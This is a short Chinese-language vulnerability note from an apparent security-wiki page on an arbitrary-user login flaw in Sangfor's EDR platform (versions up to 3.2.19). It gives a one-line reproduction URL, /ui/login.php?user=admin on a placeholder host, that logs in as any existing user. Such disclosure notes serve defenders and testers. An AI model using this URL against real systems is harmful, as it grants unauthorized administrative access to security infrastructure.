menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 深信服 chevron_right 深信服后台任意用户登陆漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    深信服后台任意用户登陆漏洞.md
    403 B / 2021-04-15 12:15:22
        # 深信服后台任意用户登陆漏洞

## 漏洞描述

深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞,登录任意用户

## 影响版本

> [!NOTE]
>
> EDR <= v3.2.19

## 漏洞复现

https://xxx.xxx.xxx.xxx/ui/login.php?user=admin

> [!NOTE]
>
> 注意最后的admin需要为存在的用户名

![](./image/sxf-2.png)
    links
    file_download